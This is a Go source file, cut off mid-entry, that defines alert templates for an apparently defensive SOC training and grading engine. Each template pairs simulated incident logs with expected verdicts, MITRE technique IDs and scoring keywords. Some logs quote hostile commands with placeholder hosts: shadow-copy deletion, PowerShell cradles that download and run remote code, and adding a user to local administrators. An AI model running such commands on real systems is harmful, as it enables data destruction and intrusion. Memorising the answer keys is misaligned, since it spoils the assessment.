package alertengine

var Library = []AlertTemplate{
	// ── CRITICAL (5) ──────────────────────────────────────────────────────────
	{
		Key: "ransom-multi-host", Severity: "critical", Source: "edr", Category: "malware",
		RuleTemplate: "Ransomware activity on {hostname} — {count} files encrypted, shadow copies deleted",
		ScenarioTmpl: "EDR detected mass file encryption on {hostname} initiated by {username}. {count} files renamed with .LOCKED extension. vssadmin.exe executed to delete volume shadow copies. SMB connections to additional hosts observed from {hostname} ({src_ip}), suggesting active lateral spread.",
		LogTemplates: []LogTemplate{
			{"error", "vssadmin.exe Delete Shadows /All /Quiet executed by {username} on {hostname}"},
			{"error", "{count} files renamed with .LOCKED extension in C:\\Users\\{username}\\Documents"},
			{"error", "Mass file encryption detected on {hostname}: {hash}.exe spawning write operations"},
			{"warn", "SMB connection attempt from {hostname} ({src_ip}) to internal hosts on port 445"},
			{"error", "Ransom note README_LOCKED.txt written to {count} directories on {hostname}"},
			{"info", "Process tree: explorer.exe → {hash}.exe → cmd.exe → vssadmin.exe"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1486", "T1490", "T1021"},
		Keywords:      []string{"ransomware", "shadow copy", "encryption", "lateral"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.2,
	},
	{
		Key: "active-exfil-c2", Severity: "critical", Source: "firewall", Category: "data-exfil",
		RuleTemplate: "Active data exfiltration from {hostname} — {count}MB outbound to {domain}",
		ScenarioTmpl: "Firewall detected sustained outbound transfer of {count}MB from {hostname} ({src_ip}) to {domain} over HTTPS port 443. Transfer has been ongoing for 47 minutes. DLP signature matched sensitive financial documents. Destination IP {src_ip} flagged in threat intel as known data aggregation endpoint.",
		LogTemplates: []LogTemplate{
			{"error", "OUTBOUND ALERT: {hostname} → {domain}:443 — {count}MB transferred, session active 47min"},
			{"error", "DLP signature match: financial_data pattern detected in SSL stream from {hostname}"},
			{"warn", "Destination {src_ip} ({domain}) flagged: C2/exfil category, confidence HIGH"},
			{"warn", "Unusual upload volume from {hostname}: 200× baseline for {username}"},
			{"info", "Process responsible: {hash}.exe (unsigned, dropped to %TEMP%) on {hostname}"},
			{"error", "SSL inspection: {count} archive segments detected in outbound stream to {domain}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1041", "T1048"},
		Keywords:      []string{"exfiltration", "outbound", "data loss", "megabytes"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.2,
	},
	{
		Key: "domain-admin-takeover", Severity: "critical", Source: "auth", Category: "privilege-escalation",
		RuleTemplate: "Domain Admin {username} authenticated from external IP {src_ip}",
		ScenarioTmpl: "Active Directory event log shows domain admin account {username} authenticated successfully from external IP {src_ip} at 02:17 UTC. This IP has never been seen for this account. Geolocation indicates Eastern Europe. MFA was not triggered — possible token theft or MFA fatigue attack. {count} privileged actions executed in the 15 minutes following login.",
		LogTemplates: []LogTemplate{
			{"error", "AD Auth SUCCESS: {username} (Domain Admin) from {src_ip} — event ID 4624"},
			{"error", "MFA not required for auth from {src_ip} — conditional access policy gap"},
			{"warn", "Logon type 3 (network) from foreign IP {src_ip} for privileged account {username}"},
			{"error", "New GPO created by {username} 3 minutes after login from {src_ip}"},
			{"error", "{count} user accounts modified by {username} — possible credential harvesting prep"},
			{"warn", "LAPS password for {hostname} read by {username} from {src_ip}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1078", "T1098"},
		Keywords:      []string{"domain admin", "foreign IP", "privilege", "unauthorized"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.2,
	},
	{
		Key: "wiper-deployed", Severity: "critical", Source: "edr", Category: "malware",
		RuleTemplate: "Disk wiper malware executed on {hostname} — MBR overwrite detected",
		ScenarioTmpl: "EDR telemetry on {hostname} shows raw disk write to sector 0 (MBR) by process {hash}.exe running as {username}. The binary is unsigned and was dropped 12 minutes prior via {src_ip}. Additional hosts {count} in the environment show the same process hash. System rebooted and is no longer reachable — likely rendered unbootable.",
		LogTemplates: []LogTemplate{
			{"error", "Raw disk write to sector 0 (MBR) by {hash}.exe on {hostname} — WIPER SIGNATURE"},
			{"error", "{hash}.exe dropped to C:\\Windows\\Temp\\ from {src_ip} 12 min before execution"},
			{"error", "Process privileges: SeBackupPrivilege, SeRestorePrivilege granted to {username}"},
			{"warn", "Same hash {hash} detected on {count} additional endpoints"},
			{"error", "Host {hostname} became unreachable 4 seconds after MBR write"},
			{"info", "Pre-execution: {hash}.exe enumerated attached drives via IoGetDeviceObjectPointer"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1561", "T1485"},
		Keywords:      []string{"wiper", "MBR", "disk", "irreversible"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.2,
	},
	{
		Key: "breach-confirmed", Severity: "critical", Source: "siem", Category: "malware",
		RuleTemplate: "SIEM correlation: full kill chain confirmed on {hostname} — phish→exec→lateral→exfil",
		ScenarioTmpl: "SIEM correlation rule fired after linking events across 6-hour window: phishing email opened by {username} at 08:12, macro executed at 08:15, C2 beacon to {domain} established at 08:18, lateral movement to {count} hosts via pass-the-hash at 10:45, sensitive data staged at 13:22, and outbound exfiltration of {count}MB to {src_ip} confirmed at 14:07.",
		LogTemplates: []LogTemplate{
			{"warn", "Email gateway: {username} opened phishing attachment invoice_Q2.xlsm at 08:12"},
			{"error", "Office macro execution: cmd.exe spawned from EXCEL.EXE on {hostname} at 08:15"},
			{"error", "C2 beacon established: {hostname} → {domain}:{port} at 08:18 (JA3 hash match)"},
			{"error", "Pass-the-hash lateral movement: {username} NTLM relay to {count} hosts at 10:45"},
			{"error", "Data staging: {count}MB archived to {filename} in C:\\Users\\Public at 13:22"},
			{"error", "Confirmed exfil: {count}MB → {src_ip} over HTTPS 443 at 14:07, session 3h active"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1566", "T1059", "T1021", "T1041"},
		Keywords:      []string{"kill chain", "phishing", "lateral", "exfiltration", "breach"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.2,
	},

	// ── HIGH (10) ─────────────────────────────────────────────────────────────
	{
		Key: "malware-exec-endpoint", Severity: "high", Source: "edr", Category: "malware",
		RuleTemplate: "Malware payload executed on {hostname} by {username} — C2 connection to {domain}",
		ScenarioTmpl: "EDR flagged execution of {hash}.exe on {hostname}. The binary was downloaded from {domain} and is not code-signed. Within 30 seconds of execution, an outbound HTTPS connection was established to {src_ip}. Process hollowed svchost.exe to evade detection. {username} is a standard user with no reason to run this binary.",
		LogTemplates: []LogTemplate{
			{"error", "{hash}.exe executed on {hostname} by {username} — unsigned binary, reputation: MALICIOUS"},
			{"warn", "Process injection: {hash}.exe → svchost.exe (process hollowing detected)"},
			{"error", "C2 beacon: {hostname} → {src_ip}:{port} established 30s post-execution"},
			{"info", "Parent process: chrome.exe → {hash}.exe (drive-by download pattern)"},
			{"warn", "Registry persistence: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run modified"},
			{"error", "Memory scan: Cobalt Strike stager shellcode detected in svchost.exe (PID 4821)"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1059", "T1055"},
		Keywords:      []string{"malware", "C2", "beacon", "injection", "shellcode"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "lateral-move-creds", Severity: "high", Source: "auth", Category: "lateral-movement",
		RuleTemplate: "Lateral movement: {username} credentials used on {count} new hosts from {src_ip}",
		ScenarioTmpl: "Authentication events show {username}'s credentials used to log into {count} hosts not previously accessed, all within a 20-minute window. The connections originate from {hostname} ({src_ip}), which is not {username}'s regular workstation. This pattern is consistent with credential theft followed by network traversal using harvested NTLM hashes.",
		LogTemplates: []LogTemplate{
			{"error", "Anomalous auth: {username} logged into {count} new hosts in 20 min from {src_ip}"},
			{"warn", "NTLM auth from {hostname} ({src_ip}) — {username} not seen on this machine before"},
			{"error", "Pass-the-hash indicator: NTLM type 3 messages without type 1 from {hostname}"},
			{"warn", "Lateral path: {hostname} → SERVER-FILE-01 → SERVER-DB-01 → DC-01"},
			{"info", "SMB sessions opened by {username} from {src_ip}: {count} active simultaneously"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1021", "T1550"},
		Keywords:      []string{"lateral movement", "credential", "NTLM", "pass-the-hash"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "phishing-mass-click", Severity: "high", Source: "proxy", Category: "phishing",
		RuleTemplate: "{count} users clicked phishing link from {domain} — credential harvesting in progress",
		ScenarioTmpl: "Email security gateway detected a phishing campaign targeting {count} users. The email impersonated IT support with subject 'Urgent: Password Reset Required'. {count} users clicked the link to {domain}. The landing page is a credential harvesting site mimicking the corporate SSO portal. Several users may have entered credentials.",
		LogTemplates: []LogTemplate{
			{"error", "Phishing campaign: {count} users clicked {domain} within 8-minute window"},
			{"warn", "URL reputation: {domain} — category PHISHING, age 2 days, hosting: {src_ip}"},
			{"error", "Credential submission detected: POST /login.php on {domain} from {count} clients"},
			{"warn", "Email gateway: O365 transport rule bypassed — email marked safe by SPF/DKIM spoof"},
			{"info", "Affected users include: {username} and {count} others in finance department"},
			{"error", "SSL cert: {domain} using Let's Encrypt cert issued 1 day ago — brand impersonation"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1566", "T1078"},
		Keywords:      []string{"phishing", "credential", "harvest", "SSO", "impersonation"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "priv-esc-local-admin", Severity: "high", Source: "edr", Category: "privilege-escalation",
		RuleTemplate: "Non-admin {username} gained local admin on {hostname} via exploit",
		ScenarioTmpl: "{username} is a standard domain user on {hostname}. EDR detected execution of a known privilege escalation exploit (PrintNightmare variant) that elevated their token to SYSTEM. The user then added themselves to the local Administrators group and disabled Windows Defender. This appears to be a deliberate privilege escalation attempt.",
		LogTemplates: []LogTemplate{
			{"error", "PrintNightmare exploit pattern on {hostname}: SpoolSS.dll loaded from UNC path"},
			{"error", "Token elevation: {username} elevated from Standard → SYSTEM on {hostname}"},
			{"error", "{username} added to local Administrators group: net localgroup administrators {username} /add"},
			{"warn", "Windows Defender real-time protection disabled on {hostname} by {username}"},
			{"warn", "Exploit binary dropped to C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"},
			{"info", "Post-exploitation: whoami /all executed, net user, netstat -an"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1068", "T1134"},
		Keywords:      []string{"privilege escalation", "SYSTEM", "exploit", "administrator"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "c2-beacon-pattern", Severity: "high", Source: "firewall", Category: "c2",
		RuleTemplate: "Regular HTTPS beacon from {hostname} to {domain} every {count} seconds",
		ScenarioTmpl: "Network monitoring detected highly regular HTTPS connections from {hostname} to {domain} ({src_ip}) at exactly {count}-second intervals over the past 6 hours. The connection pattern — fixed interval, consistent payload size, odd hours — is consistent with C2 beaconing. The domain was registered 3 days ago and has no legitimate business purpose.",
		LogTemplates: []LogTemplate{
			{"error", "C2 beacon pattern: {hostname} → {domain} every {count}s for 6 hours (jitter: 0%)"},
			{"warn", "Domain intel: {domain} age 3 days, Alexa rank N/A, hosting: bulletproof provider"},
			{"warn", "SSL: self-signed cert on {domain}, CN=localhost — not enterprise grade"},
			{"info", "Payload size consistent: 1,024 bytes per request (command channel signature)"},
			{"error", "Threat intel match: {src_ip} listed in 3 C2 feed blocklists"},
			{"warn", "Process: {hash}.exe on {hostname} owns all connections — not a browser"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1071", "T1132"},
		Keywords:      []string{"C2", "beacon", "interval", "command and control"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "staged-exfil-zip", Severity: "high", Source: "edr", Category: "data-exfil",
		RuleTemplate: "Sensitive data archived to {filename} on {hostname} before exfiltration",
		ScenarioTmpl: "{username} on {hostname} used 7-Zip to archive {count} files matching sensitive data patterns (salary, contract, IP) into {filename}. The archive was then moved to a public share and accessed from {src_ip} within 10 minutes. DLP rules flagged the file names included in the archive as classified internal documents.",
		LogTemplates: []LogTemplate{
			{"warn", "7z.exe archiving {count} files to {filename} on {hostname} by {username}"},
			{"error", "DLP: {filename} contains patterns matching CONFIDENTIAL classification"},
			{"error", "{filename} ({count}MB) moved to \\\\SERVER-FILE-01\\Public\\ by {username}"},
			{"warn", "File accessed from external IP {src_ip} via SMB 4 min after staging"},
			{"info", "Archive contents: salary_2026.xlsx, {filename}, client_contracts_Q2.zip"},
			{"warn", "User {username} searched 'how to zip encrypt files windows' on corporate browser"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1560", "T1041"},
		Keywords:      []string{"archive", "staged", "exfiltration", "DLP", "sensitive"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "aws-root-login", Severity: "high", Source: "cloudtrail", Category: "privilege-escalation",
		RuleTemplate: "AWS root account login from foreign IP {src_ip} — MFA not used",
		ScenarioTmpl: "AWS CloudTrail recorded a console login using the root account from IP {src_ip}, geolocated to a foreign country. MFA was not used during this authentication. The root account was dormant for 8 months prior. Following login, {count} IAM policies were modified and a new administrator IAM user was created.",
		LogTemplates: []LogTemplate{
			{"error", "CloudTrail: ConsoleLogin root account from {src_ip} — MFAUsed: false"},
			{"error", "Root account idle 8 months — first login from unrecognized IP {src_ip}"},
			{"error", "IAM: {count} policy modifications in 5 min following root login"},
			{"error", "New IAM admin user created: 'backup-admin' with full AdministratorAccess"},
			{"warn", "S3 bucket ACL modified to public-read on {count} buckets by root"},
			{"info", "CloudTrail: root session active 22 minutes, {count} API calls recorded"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1078", "T1552"},
		Keywords:      []string{"root", "AWS", "IAM", "cloud", "MFA"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "rdp-brute-success", Severity: "high", Source: "auth", Category: "brute-force",
		RuleTemplate: "RDP brute force against {hostname} succeeded — {username} auth from {src_ip}",
		ScenarioTmpl: "{count} failed RDP authentication attempts against {hostname} from {src_ip} over 45 minutes, followed by a successful login as {username}. The source IP has been associated with credential stuffing campaigns. {username} is a service account that should not be logging in interactively. The attacker established a persistent session.",
		LogTemplates: []LogTemplate{
			{"error", "{count} RDP auth failures for multiple accounts on {hostname} from {src_ip}"},
			{"error", "RDP SUCCESS: {username} authenticated on {hostname} from {src_ip} after brute force"},
			{"warn", "Service account {username} used for interactive RDP — anomalous behavior"},
			{"error", "Remote session active: {username}@{hostname} from {src_ip} — 47 min duration"},
			{"warn", "Post-login: cmd.exe, whoami, net user executed via RDP session"},
			{"info", "Source {src_ip} threat intel: credential stuffing, brute force campaign operator"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1110", "T1021"},
		Keywords:      []string{"brute force", "RDP", "credential", "authentication", "remote"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "supply-chain-pkg", Severity: "high", Source: "edr", Category: "malware",
		RuleTemplate: "Malicious npm package postinstall executed on {hostname} by {username}",
		ScenarioTmpl: "{username} ran 'npm install' on {hostname}, triggering a malicious postinstall script from the package '{domain}' (typosquat of legitimate library). The script executed a PowerShell command that downloaded a binary from {src_ip} and established persistence. Package had {count} installs before being flagged.",
		LogTemplates: []LogTemplate{
			{"error", "npm install: postinstall script spawned PowerShell on {hostname} — {hash}.ps1"},
			{"error", "PowerShell download: IEX(New-Object Net.WebClient).DownloadString('{src_ip}/{hash}')"},
			{"error", "Binary {hash}.exe dropped to %APPDATA% and executed on {hostname}"},
			{"warn", "Package '{domain}' identified as typosquat — differs by 1 char from legitimate package"},
			{"error", "Persistence: scheduled task 'WindowsUpdate{hash}' created by npm postinstall"},
			{"info", "Package registry: {domain} published 4 days ago, {count} downloads, no review"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1195", "T1059"},
		Keywords:      []string{"supply chain", "npm", "postinstall", "typosquat", "package"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},
	{
		Key: "insider-bulk-copy", Severity: "high", Source: "ueba", Category: "data-exfil",
		RuleTemplate: "{username} copied {count} sensitive files before scheduled resignation",
		ScenarioTmpl: "UEBA flagged {username} for anomalous file access: {count} files accessed in the last 48 hours vs average of 12/week. HR confirmed {username} submitted resignation 3 days ago. Files accessed include IP, contracts, and product roadmaps. A USB device was connected to {hostname} 2 hours before this alert.",
		LogTemplates: []LogTemplate{
			{"error", "UEBA: {username} accessed {count} files in 48h (400% above baseline)"},
			{"warn", "HR flag: {username} has active resignation — last day in {count} days"},
			{"warn", "USB device connected to {hostname} by {username} at 14:32"},
			{"error", "File access: {filename}, client_list.csv, product_roadmap.pptx accessed by {username}"},
			{"error", "DLP: {count}MB copied to removable media from {hostname}"},
			{"info", "UEBA risk score: {username} elevated to HIGH (91/100) — insider threat pattern"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1078", "T1048"},
		Keywords:      []string{"insider", "resignation", "USB", "bulk", "UEBA"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.1,
	},

	// ── MEDIUM (20) ───────────────────────────────────────────────────────────
	{
		Key: "multi-account-lockout", Severity: "medium", Source: "auth", Category: "brute-force",
		RuleTemplate: "{count} accounts locked out from {src_ip} in 10 minutes",
		ScenarioTmpl: "Active Directory recorded {count} account lockouts within a 10-minute window, all originating from source IP {src_ip}. The lockouts span multiple departments, suggesting a password spray attack using commonly used passwords (Password1!, Summer2026). Not all attempts succeeded, but the pattern warrants investigation.",
		LogTemplates: []LogTemplate{
			{"error", "{count} account lockouts in 10 min from source {src_ip} — spray pattern"},
			{"warn", "Accounts locked: {username}, hradmin, bwalker, cjohnson, tmiller"},
			{"info", "Auth failure pattern: sequential usernames with same password 'Summer2026!'"},
			{"warn", "Source {src_ip} geo: anonymous proxy/VPN exit node"},
			{"info", "AD: Event ID 4740 (lockout) × {count} in domain across {count} OUs"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1110"},
		Keywords:      []string{"lockout", "password spray", "brute force", "multiple accounts"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "suspicious-process-spawn", Severity: "medium", Source: "edr", Category: "malware",
		RuleTemplate: "Browser spawning cmd.exe on {hostname} — possible drive-by exploit",
		ScenarioTmpl: "EDR on {hostname} detected chrome.exe spawning cmd.exe, which then executed PowerShell with an encoded command. This process ancestry is characteristic of a browser exploit or malicious macro. The process executed under {username}'s context. Network connection to {domain} followed within 5 seconds.",
		LogTemplates: []LogTemplate{
			{"error", "Anomalous process: chrome.exe → cmd.exe → powershell.exe on {hostname}"},
			{"error", "PowerShell: EncodedCommand parameter used — base64 payload detected"},
			{"warn", "Decoded command: IEX(New-Object Net.WebClient).DownloadString('http://{domain}/{hash}')"},
			{"info", "User {username} browsing {domain} when process tree initiated"},
			{"warn", "Outbound conn 5s post-spawn: {hostname} → {src_ip}:{port}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1059", "T1204"},
		Keywords:      []string{"browser", "PowerShell", "encoded", "process spawn", "exploit"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "dns-dga-query", Severity: "medium", Source: "firewall", Category: "c2",
		RuleTemplate: "DGA-pattern DNS queries from {hostname} to {count} random domains",
		ScenarioTmpl: "{hostname} is generating DNS queries to {count} algorithmically generated domain names over the past 2 hours. DGA detection ML model confidence: 94%. Domains follow pattern of 12-18 random lowercase chars with .com/.net TLDs, none resolving. This is consistent with malware that uses DGA to find its active C2 server.",
		LogTemplates: []LogTemplate{
			{"error", "DGA detected: {hostname} queried {count} random domains in 2h — ML confidence 94%"},
			{"warn", "Sample queries: xkqmvrbztnpla.com, wqjhncbpatmo.net, zxmvlprqtyna.org"},
			{"info", "All {count} domains NXDOMAIN — C2 server not yet registered or rotating"},
			{"warn", "DNS query rate: {count} queries/min from {hostname} — 50× baseline"},
			{"error", "Process generating DNS: {hash}.exe (not in approved software list) on {hostname}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1568", "T1071"},
		Keywords:      []string{"DGA", "domain generation", "C2", "DNS", "malware"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "large-upload-cloud", Severity: "medium", Source: "proxy", Category: "data-exfil",
		RuleTemplate: "{username} uploaded {count}MB to personal cloud storage from {hostname}",
		ScenarioTmpl: "Proxy logs show {username} uploaded {count}MB to a personal Dropbox/Google Drive account from {hostname} over 3 hours. The volume is 800% above the user's monthly average. The uploads occurred during business hours and include files with names suggesting corporate documents (Q2 financials, HR records).",
		LogTemplates: []LogTemplate{
			{"warn", "Proxy: {username}@{hostname} → dropbox.com upload {count}MB (800% baseline)"},
			{"warn", "SSL inspection: {count} files uploaded, names include 'Q2_Report', 'HR_Data'"},
			{"info", "Upload destination: personal account (not corporate Dropbox tenant)"},
			{"info", "Duration: 3 hours, continuous upload sessions by {username}"},
			{"warn", "DLP: corporate document pattern detected in upload stream from {hostname}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1567"},
		Keywords:      []string{"upload", "cloud storage", "personal", "exfiltration", "data"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "vpn-new-country", Severity: "medium", Source: "auth", Category: "lateral-movement",
		RuleTemplate: "{username} VPN login from new country — IP {src_ip}",
		ScenarioTmpl: "{username} authenticated to the corporate VPN from {src_ip}, geolocated to a country this user has never logged in from before. The user's previous {count} logins were all from the home country. Device fingerprint does not match any registered device for this user. No travel request on file for {username}.",
		LogTemplates: []LogTemplate{
			{"error", "VPN auth: {username} from {src_ip} (new country — never seen for this account)"},
			{"warn", "Device fingerprint mismatch: unknown device for {username}"},
			{"info", "{username} last {count} successful logins: domestic, normal hours"},
			{"warn", "No travel request on file for {username} in HR system"},
			{"info", "VPN session: {username} accessed internal resources for 2h from {src_ip}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1078", "T1133"},
		Keywords:      []string{"VPN", "foreign", "geolocation", "impossible travel", "account"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "sched-task-created", Severity: "medium", Source: "edr", Category: "persistence",
		RuleTemplate: "Suspicious scheduled task created on {hostname} by {username}",
		ScenarioTmpl: "Windows Event Log recorded creation of a scheduled task named 'WindowsDefender{hash}' on {hostname} by {username} outside of normal change windows. The task runs a PowerShell command every 15 minutes pointing to {domain}. This mimics a legitimate-sounding task name as a persistence mechanism.",
		LogTemplates: []LogTemplate{
			{"error", "Scheduled task created: 'WindowsDefender{hash}' on {hostname} by {username}"},
			{"warn", "Task action: powershell.exe -ep bypass -c IEX(iwr '{domain}/{hash}')"},
			{"warn", "Task trigger: every 15 minutes, runs as SYSTEM"},
			{"info", "Event ID 4698 (scheduled task created) — outside change window 22:14 UTC"},
			{"warn", "Task name mimics system process — social engineering via naming convention"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1053"},
		Keywords:      []string{"scheduled task", "persistence", "PowerShell", "task scheduler"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "unsigned-driver-install", Severity: "medium", Source: "edr", Category: "persistence",
		RuleTemplate: "Unsigned driver installed on {hostname} — kernel level access",
		ScenarioTmpl: "An unsigned kernel driver ({hash}.sys) was installed on {hostname} by {username}. Unsigned drivers can bypass security controls and operate at the kernel level, enabling rootkit functionality, AV evasion, and hardware-level persistence. The driver was loaded using a known BYOVD (Bring Your Own Vulnerable Driver) technique.",
		LogTemplates: []LogTemplate{
			{"error", "Unsigned driver loaded: {hash}.sys on {hostname} — no valid code signature"},
			{"error", "BYOVD technique: vulnerable driver used to disable DSE (Driver Signature Enforcement)"},
			{"warn", "sc.exe used to create and start kernel service by {username} on {hostname}"},
			{"error", "Driver hash {hash} matches known rootkit dropper in threat intel"},
			{"info", "System boot: {hash}.sys loaded at kernel init — persistent across reboots"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1547", "T1014"},
		Keywords:      []string{"driver", "kernel", "unsigned", "rootkit", "BYOVD"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "new-admin-account", Severity: "medium", Source: "auth", Category: "persistence",
		RuleTemplate: "New local admin account created on {hostname} outside change window",
		ScenarioTmpl: "A new local administrator account was created on {hostname} by {username} at 23:47 UTC — outside of the approved change window. The account is named 'svc_update' to blend in with service accounts. No ticket exists for this change. This could be an attacker establishing a backdoor account for persistent access.",
		LogTemplates: []LogTemplate{
			{"error", "Event 4720: New account 'svc_update' created on {hostname} by {username} at 23:47"},
			{"error", "Event 4732: svc_update added to Administrators group on {hostname}"},
			{"warn", "Account creation outside change window (22:00–06:00 UTC blocked period)"},
			{"info", "No ITSM ticket found for this account creation"},
			{"warn", "Account 'svc_update' mimics service account naming convention"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1136", "T1098"},
		Keywords:      []string{"new account", "administrator", "backdoor", "persistence", "change window"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "cleartext-creds-script", Severity: "medium", Source: "edr", Category: "data-exfil",
		RuleTemplate: "Plaintext credentials found in script file on {hostname}",
		ScenarioTmpl: "File integrity monitoring on {hostname} detected a PowerShell script containing hardcoded credentials in plaintext. The script was created by {username} and contains a service account password and database connection string. The file is in a shared directory accessible by {count} users.",
		LogTemplates: []LogTemplate{
			{"error", "FIM alert: deploy_{hash}.ps1 on {hostname} contains plaintext credentials"},
			{"warn", "Credential found: $dbpass = 'P@ssw0rd123' in deploy_{hash}.ps1"},
			{"warn", "File location: \\\\{hostname}\\Scripts\\ — readable by {count} domain users"},
			{"info", "Created by {username} at 14:22, last modified 3 days ago"},
			{"warn", "Connection string exposes SA account on SERVER-DB-01 in script"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1552"},
		Keywords:      []string{"plaintext", "credential", "password", "hardcoded", "script"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "mfa-spike-failures", Severity: "medium", Source: "auth", Category: "brute-force",
		RuleTemplate: "{count} MFA push failures for {username} in 5 minutes — possible MFA fatigue",
		ScenarioTmpl: "{username} has received {count} MFA push notification denials in 5 minutes. The authentication attempts are coming from {src_ip}, a new IP for this account. This pattern is consistent with MFA fatigue attacks — bombarding the user with push notifications hoping they accept one. The account password has likely already been compromised.",
		LogTemplates: []LogTemplate{
			{"error", "MFA: {count} push denials for {username} in 5 min from {src_ip} — fatigue attack"},
			{"warn", "All MFA requests from {src_ip} — not {username}'s registered device"},
			{"info", "Successful password auth preceded each MFA request — password compromised"},
			{"warn", "User {username} reported in Slack: 'getting constant MFA push spam'"},
			{"error", "Risk: if {username} accepts any push, account fully compromised from {src_ip}"},
